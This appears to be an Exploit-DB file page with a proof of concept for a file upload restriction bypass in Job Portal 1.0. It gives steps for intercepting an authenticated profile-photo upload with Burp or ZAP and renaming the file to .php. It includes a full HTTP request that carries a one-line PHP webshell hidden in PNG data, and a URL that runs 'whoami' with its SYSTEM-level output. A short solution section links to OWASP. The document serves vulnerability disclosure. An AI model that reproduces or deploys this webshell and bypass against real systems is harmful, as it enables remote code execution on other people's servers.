bfc4baf25a
7 changes to exploits/shellcodes/ghdb FLEX 1080 < 1085 Web 1.6.0 - Denial of Service Epson Stylus SX510W Printer Remote Power Off - Denial of Service Job Portal 1.0 - File Upload Restriction Bypass Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS) RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
80 lines
No EOL
2.4 KiB
Text
80 lines
No EOL
2.4 KiB
Text
<!--
|
|
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
|
|
# Date: 27-06-2019
|
|
# Exploit Author: Rafael Pedrero
|
|
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
|
|
# Software Link:
|
|
https://phpgurukul.com/?smd_process_download=1&download_id=7855
|
|
# Version: 1.0
|
|
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
|
|
# CVE :
|
|
# Category: webapps
|
|
|
|
|
|
1. Description
|
|
|
|
File Upload Restriction Bypass vulnerabilities were found in Job Portal
|
|
1.0. This allows for an authenticated user to potentially obtain RCE via
|
|
webshell.
|
|
|
|
|
|
2. Proof of Concept
|
|
|
|
1. Go the user profile >> (/jobportal/applicant/)
|
|
2.- Select profile image and load a valid image.
|
|
3. Turn Burp/ZAP Intercept On
|
|
4. Select webshell - ex: shell.png
|
|
5. Alter request in the upload...
|
|
Update 'filename' to desired extension. ex: shell.php
|
|
Not neccesary change content type to 'image/png'
|
|
|
|
Example exploitation request:
|
|
|
|
====================================================================================================
|
|
|
|
POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
|
|
HTTP/1.1
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
|
|
Gecko/20100101 Firefox/70.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------57052814523281
|
|
Content-Length: 555
|
|
Origin: https://127.0.0.1
|
|
Connection: keep-alive
|
|
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
|
|
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
|
|
Upgrade-Insecure-Requests: 1
|
|
Host: 127.0.0.1
|
|
|
|
-----------------------------57052814523281
|
|
Content-Disposition: form-data; name="MAX_FILE_SIZE"
|
|
|
|
1000000
|
|
-----------------------------57052814523281
|
|
Content-Disposition: form-data; name="photo"; filename="shell.php"
|
|
Content-Type: image/png
|
|
|
|
?PNG
|
|
...
|
|
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
|
|
IEND
|
|
-----------------------------57052814523281
|
|
Content-Disposition: form-data; name="savephoto"
|
|
|
|
|
|
-----------------------------57052814523281--
|
|
|
|
====================================================================================================
|
|
|
|
6. Send the request and visit your new webshell
|
|
Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
|
|
nt authority\system
|
|
|
|
3. Solution:
|
|
|
|
Patch:
|
|
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
|
|
|
|
--> |